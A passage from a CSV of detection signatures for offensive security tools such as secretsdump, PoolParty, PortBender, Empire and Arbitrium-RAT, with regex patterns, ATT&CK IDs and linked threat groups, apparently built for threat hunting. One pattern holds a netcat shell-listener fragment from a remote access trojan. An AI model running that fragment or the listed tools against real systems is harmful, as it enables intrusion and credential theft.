TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","54995" "*polenum -h*",".{0,1000}polenum\s\-h.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - 
TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","54996" "*Policy SPN target name validation might be restricting full DRSUAPI dump*",".{0,1000}Policy\sSPN\starget\sname\svalidation\smight\sbe\srestricting\sfull\sDRSUAPI\sdump.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54997" "*Policy SPN target name validation might be restricting full DRSUAPI dump*",".{0,1000}Policy\sSPN\starget\sname\svalidation\smight\sbe\srestricting\sfull\sDRSUAPI\sdump.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54998" "*pony-02.aftxt*",".{0,1000}pony\-02\.aftxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55000" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55002" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black 
Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55003" "*PoolParty.exe *",".{0,1000}PoolParty\.exe\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55004" "*PoolPartyBof *",".{0,1000}PoolPartyBof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55005" "*PoolPartyBof * HTTPSLocal*",".{0,1000}PoolPartyBof\s.{0,1000}\sHTTPSLocal.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55006" "*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55007" "*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege 
Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55008" "*PoolPartyBof.h*",".{0,1000}PoolPartyBof\.h.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#content","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55009" "*PoolPartyBof.zip*",".{0,1000}PoolPartyBof\.zip.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55010" "*PoolPartyBof_V4.x64*",".{0,1000}PoolPartyBof_V4\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55011" "*PoolPartyBof_V4.x64*",".{0,1000}PoolPartyBof_V4\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55012" "*PoolPartyBof_V5.x64*",".{0,1000}PoolPartyBof_V5\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege 
Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55013" "*PoolPartyBof_V6.x64*",".{0,1000}PoolPartyBof_V6\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55014" "*PoolPartyBof_V7.x64*",".{0,1000}PoolPartyBof_V7\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55015" "*PoolPartyBof_V8.x64*",".{0,1000}PoolPartyBof_V8\.x64.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55016" "*PoolPartyBof-main*",".{0,1000}PoolPartyBof\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","55017" "*PoolParty-main.zip*",".{0,1000}PoolParty\-main\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55018" "*PoolParty-PoolParty.zip*",".{0,1000}PoolParty\-PoolParty\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","55019" "*Popen(""exec $(nc -l 0.0.0.0 -p *",".{0,1000}Popen\(\""exec\s\$\(nc\s\-l\s0\.0\.0\.0\s\-p\s.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - 
TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","55020" "*pornhub.py*",".{0,1000}pornhub\.py.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","55021" "*port_forward_pivot.py*",".{0,1000}port_forward_pivot\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - 
Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55022" "*port_scanner_ip_obj.py*",".{0,1000}port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","55023" "*port_scanner_regex.py*",".{0,1000}port_scanner_regex\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","55024" "*PortBender backdoor*",".{0,1000}PortBender\sbackdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55026" "*PortBender redirect*",".{0,1000}PortBender\sredirect.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55027" "*PortBender.cna*",".{0,1000}PortBender\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 
BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55028" "*PortBender.cpp*",".{0,1000}PortBender\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55029" 
"*portbender.dll*",".{0,1000}portbender\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55030" "*PortBender.exe*",".{0,1000}PortBender\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55031" "*PortBender.h*",".{0,1000}PortBender\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
